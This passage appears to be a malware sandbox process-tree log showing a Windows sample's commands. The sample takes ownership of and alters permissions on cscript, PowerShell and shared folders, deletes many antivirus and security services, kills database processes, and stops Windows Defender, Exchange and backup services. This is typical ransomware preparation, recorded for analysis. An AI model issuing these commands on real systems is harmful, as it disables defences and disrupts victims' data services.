C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "PSUAService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "NanoServiceMain"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPIntegrationService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPProtectedService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPRedline"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "EPUpdateService"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "EPSecurityService"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UniFi"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im PccNTMon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im NTRtScan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmListen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmCCSF.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmProxy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TMBMSRV.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im TmPfw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im CNTAoSMgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msmdsrv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im MsDtsSrvr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlceip.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im Ssms.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im SQLAGENT.EXE3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im fdlauncher.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im ReportingServicesService.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im pg_ctl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im postgres.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$MSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$ISARS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\net.exenet stop mr2kserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mr2kserv4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeADTopology3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeADTopology4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeFBA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeFBA4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA4⤵
-
C:\Windows\SysWOW64\net.exenet stop ShadowProtectSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShadowProtectSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop SPAdminV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPAdminV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTimerV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTimerV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPTraceV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPTraceV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPUserCodeV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPUserCodeV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPWriterV43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPWriterV44⤵
-
C:\Windows\SysWOW64\net.exenet stop SPSearch43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SPSearch44⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop IISADMIN3⤵
-
